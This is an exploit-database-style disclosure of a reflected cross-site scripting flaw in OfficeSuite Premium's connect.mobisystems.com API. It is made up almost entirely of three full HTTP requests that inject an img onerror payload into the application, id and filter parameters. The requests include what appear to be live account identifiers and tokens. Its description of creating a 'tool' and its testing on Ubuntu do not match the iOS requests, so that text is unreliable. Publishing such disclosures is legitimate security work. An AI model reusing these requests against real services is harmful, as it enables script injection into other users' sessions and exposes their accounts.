# Exploit Title: Office Suite Premium 10.9.1.42602 - Cross-Site Scripting (reflected)
# Date: 06-26-2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.mobisystems.com/
# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506
# Version: Office Suite Premium 10.9.1.42602
# Tested on: Ubuntu 18.04
# POC
# Exploit Details : Following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.
Request 1:
GET /api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code HTTP/2
Host: connect.mobisystems.com
Accept: */*
Clv: 42602
Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free
Accept-Language: en_EN,en;q=0.9
Accept-Encoding: gzip, deflate
App: com.mobisystems.ios.office.free
User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0
Gdpr: true
Account: 234c89ff-7e80-4b64-9d35-8653fe131795
Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19
Url: https://connect.mobisystems.com/api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code
Payload: <img src=a onerror=alert(1)>
Parameter : application
Request 2 :
GET /api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527 HTTP/2
Host: connect.mobisystems.com
Accept: */*
Clv: 42602
Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free
Accept-Language: en_EN,en;q=0.9
Accept-Encoding: gzip, deflate
App: com.mobisystems.ios.office.free
User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0
Lang: en_EN
Gdpr: true
Account: 234c89ff-7e80-4b64-9d35-8653fe131795
Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19
URL : https://connect.mobisystems.com/api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527
Payload : <img src=a onerror=alert(1)>
Parameter: id
Request 3 :
GET /api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search HTTP/2
Host: connect.mobisystems.com
Accept: */*
Clv: 42602
Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free
Accept-Language: en_EN,en;q=0.9
Accept-Encoding: gzip, deflate
App: com.mobisystems.ios.office.free
User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0
Lang: en_EN
Gdpr: true
Account: 234c89ff-7e80-4b64-9d35-8653fe131795
Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19
URL : https://connect.mobisystems.com/api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search
Payload :<img src=a onerror=alert(1)>
Parameter: filter